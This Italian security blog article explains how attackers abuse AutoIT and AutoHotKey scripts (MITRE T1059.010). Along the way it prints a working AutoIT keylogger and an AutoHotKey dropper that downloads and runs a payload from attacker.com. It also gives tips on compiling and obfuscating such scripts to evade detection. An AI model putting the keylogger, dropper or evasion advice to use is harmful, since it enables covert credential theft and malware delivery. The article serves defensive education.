Script di Automazione Malevoli: Command and Scripting Interpreter - AutoHotKey & AutoIT (T1059.010)

Gli script di automazione AutoIT e AutoHotKey rappresentano una superficie d'attacco particolarmente insidiosa nel panorama delle minacce moderne. Questi linguaggi di scripting, progettati per automatizzare attività Windows legittime, vengono sfruttati per eseguire codice malevolo mascherandosi da processi apparentemente innocui.

La tecnica si inserisce nella tattica TA0002 (Execution), consentendo agli avversari di eseguire comandi arbitrari sul sistema compromesso. Gli attaccanti sfruttano file .ahk per AutoHotKey e .au3 per AutoIT, spesso compilandoli in eseguibili standalone per aumentare la furtività.

5 famiglie di malware documentate utilizzano attivamente questa tecnica, mentre 1 gruppo APT ha integrato questi script nelle proprie campagne offensive. La versatilità di questi linguaggi permette di implementare keylogger, dropper modulari e payload complessi mascherati da semplici automazioni.

Per comprendere l'efficacia di questa tecnica, inizia creando un semplice payload AutoIT che simula un keylogger. Il codice base può essere scritto in pochi minuti:

#include <Misc.au3>
$dll = DllOpen("user32.dll")
$file = FileOpen("log.txt", 1)
While 1
    For $i = 1 To 255
        If _IsPressed(Hex($i, 2), $dll) Then
            FileWrite($file, Chr($i))
        EndIf
    Next
WEnd

Compila lo script in un eseguibile usando Aut2Exe.exe per nascondere il codice sorgente. DarkGate utilizza proprio questa strategia, rilasciando script come test.au3 in directory nascoste durante l'installazione iniziale.

Per AutoHotKey, la sintassi è ancora più immediata. Un dropper base può scaricare ed eseguire payload remoti:

UrlDownloadToFile, http://attacker.com/payload.exe, %TEMP%\update.exe
Run, %TEMP%\update.exe

La potenza di questi linguaggi sta nella loro capacità di interagire con l'intero sistema Windows. XLoader sfrutta AutoIT per decifrare file payload, caricarli in memoria e eseguirli senza toccare il disco.

Per testare le detection, integra tecniche di offuscamento. Usa stringhe base64, split del codice in funzioni multiple, o incorpora gli script in documenti Office come fa APT39. I compilatori nativi producono eseguibili firmati digitalmente che bypassano molti controlli superficiali.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.